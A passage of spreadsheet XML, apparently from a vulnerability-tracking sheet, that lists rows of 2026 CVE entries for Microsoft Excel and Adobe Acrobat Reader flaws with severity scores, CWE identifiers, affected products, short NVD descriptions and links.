        </is>
      </c>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr"/>
      <c r="Q979" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R979" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81957</t>
        </is>
      </c>
      <c r="D980" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F980" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr"/>
      <c r="Q980" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R980" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81959</t>
        </is>
      </c>
      <c r="D981" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F981" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L981" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr"/>
      <c r="Q981" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R981" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81960</t>
        </is>
      </c>
      <c r="D982" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F982" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr"/>
      <c r="Q982" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R982" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81973</t>
        </is>
      </c>
      <c r="D983" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F983" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L983" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr"/>
      <c r="Q983" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R983" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81975</t>
        </is>
      </c>
      <c r="D984" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F984" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L984" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr"/>
      <c r="Q984" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R984" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81976</t>
        </is>
      </c>
      <c r="D985" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F985" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L985" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr"/>
      <c r="Q985" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R985" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81979</t>
        </is>
      </c>
      <c r="D986" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F986" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr"/>
      <c r="Q986" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R986" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81980</t>
        </is>
      </c>
      <c r="D987" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F987" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr"/>
      <c r="Q987" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R987" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81981</t>
        </is>
      </c>
      <c r="D988" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F988" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr"/>
      <c r="Q988" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R988" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81983</t>
        </is>
      </c>
      <c r="D989" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F989" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr"/>
      <c r="Q989" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R989" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81985</t>
        </is>
      </c>
      <c r="D990" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F990" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L990" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr"/>
      <c r="Q990" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R990" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81986</t>
        </is>
      </c>
      <c r="D991" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F991" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L991" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr"/>
      <c r="Q991" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R991" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81987</t>
        </is>
      </c>
      <c r="D992" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F992" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L992" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr"/>
      <c r="Q992" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R992"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S992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81988</t>
        </is>
      </c>
      <c r="D993" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F993" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L993" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr"/>
      <c r="Q993" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R993" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81989</t>
        </is>
      </c>
      <c r="D994" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F994" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr"/>
      <c r="Q994" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R994" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81990</t>
        </is>
      </c>
      <c r="D995" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F995" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L995" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr"/>
      <c r="Q995" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R995" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81992</t>
        </is>
      </c>
      <c r="D996" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F996" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr">
        <is>
